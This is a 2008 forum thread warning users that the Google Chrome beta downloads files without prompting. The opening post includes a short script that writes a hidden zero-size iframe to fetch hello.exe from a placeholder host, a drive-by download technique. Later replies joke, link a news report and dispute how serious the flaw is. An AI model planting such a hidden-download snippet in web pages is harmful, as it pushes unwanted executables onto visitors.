Do not use Google Chrome

By White Cuban
in Web Browser Discussion & Support

 Share

Recommended Posts

Veteran

White Cuban

Posted
Posted (edited)

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically

downloaded to the user's computer without any user prompt.

Example:

<script>

document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Careful guys

Edited by Matan Mates
Title edited. Please do not use all Caps. Thanks!
Link to comment
https://www.neowin.net/forum/topic/664974-do-not-use-google-chrome/
Share on other sites
Proficient

39 Thieves

Posted
Posted
im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

Veteran

White Cuban

Posted
  • Author
Posted
Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

ehm... no.

but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol

Grand Master

.Kompressor

Posted
Posted

September 2nd, 2008

Google Chrome vulnerable to carpet-bombing flaw

Posted by Ryan Naraine @ 3:05 pm

http://blogs.zdnet.com/security/?p=1843

http://blogs.zdnet.com/security/?p=1843&tag=nl.e539

Proficient

39 Thieves

Posted
Posted
Why, design looks like lego xD

Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox?

lego, pokemon ball, window media player logo...the list goes on.

By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php

Um...did you just create that forum?

Grand Master

what

Posted
Posted
Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

Mentor

+SOOPRcow MVC

Posted
  • MVC
Posted
Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is.

This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.

  • Posts

    • Google Chrome is killing all uBlock Origin bypasses, Microsoft Edge, Opera to follow

      By Nas · Posted

      Chrome is Google's commercial web browser product; it consists of their proprietary features (Googlified everything including profile sync) plus their chromium project barebones web browser. Google developers control the chromium project. The chromium project is the "core" for the web browser product from other vendors including Microsoft Edge (their own proprietary features), Opera (their own features), Brave (their own features), etc... The "downstream" teams at Microsoft, Opera, Brave, etc., can either integrate their original MV2-supporting code into future builds, or they can integrate chromium wholesale and simply add-on their own features/functionalities -- their 'current' build pipeline, so to speak. THIS is why changes at the chromium project affect so many products besides only Google's commercial Chrome browser. -- Edit to add: The chromium project is open-source, and is the piece that's Google's code contribution to the W3C and world wide web at large; there are no licensing fees for others to use the code in their own products... which is what they do. Other browser engines do exist (Firefox's for example) but it's nearly impossible to have both engines bundled into the same 1 browser product.
    • WhatsApp slams Isreali firm, NSO Group, for trying to spy on its users

      By AsherGZ · Posted

      You're comparing settler colonies to colonized war torn nations. It's easy to become the richest by coming in and stealing other people's land, culture and resources.
    • Google Chrome is killing all uBlock Origin bypasses, Microsoft Edge, Opera to follow

      By Nas · Posted

      ABP has become "old news" when MV3 started rolling out. They've gone downhill and is now simply irrelevant..... in my experience.
    • Google Chrome is killing all uBlock Origin bypasses, Microsoft Edge, Opera to follow

      By Ottos · Posted

      About two years ago, I switched to Brave and haven't looked back.
    • Google Chrome is killing all uBlock Origin bypasses, Microsoft Edge, Opera to follow

      By Nas · Posted

      FWIW StatCounter has been trash for over 25+ years! Back in the day (circa 2000 and GeoCities pre-Blogger era), it was useful to paste a number on your webpage indicating how many visitors you had. In the ensuing 25+ years, they've grown in reputation and changed their ways... but their overall consumer value has remained abysmal. Serious marketing agencies only cite StatCounter when there's literally no other sources available to support any marketing claims! They are the absolute lowest threshold serious companies use to push any sort of narrative about this-or-that happening. Besides their credibility being what it is, they are forever subject to quality issues. They're so bad that my DNS-level ad-filter prevents me from even viewing their main website! HA!

  • Recent Achievements

    • Week One Done
      rubentuben8 earned a badge
      Week One Done
    • Week One Done
      ARaclen earned a badge
      Week One Done
    • One Year In
      jojodbn earned a badge
      One Year In
    • One Month Later
      jojodbn earned a badge
      One Month Later
    • Week One Done
      jojodbn earned a badge
      Week One Done

  • Popular Contributors

    1. 1
      +primortal
      531
    2. 2
      PsYcHoKiLLa
      231
    3. 3
      +Edouard
      131
    4. 4
      ATLien_0
      88
    5. 5
      Steven P.
      81
    Show More

  • Tell a friend

    Love Neowin? Tell a friend!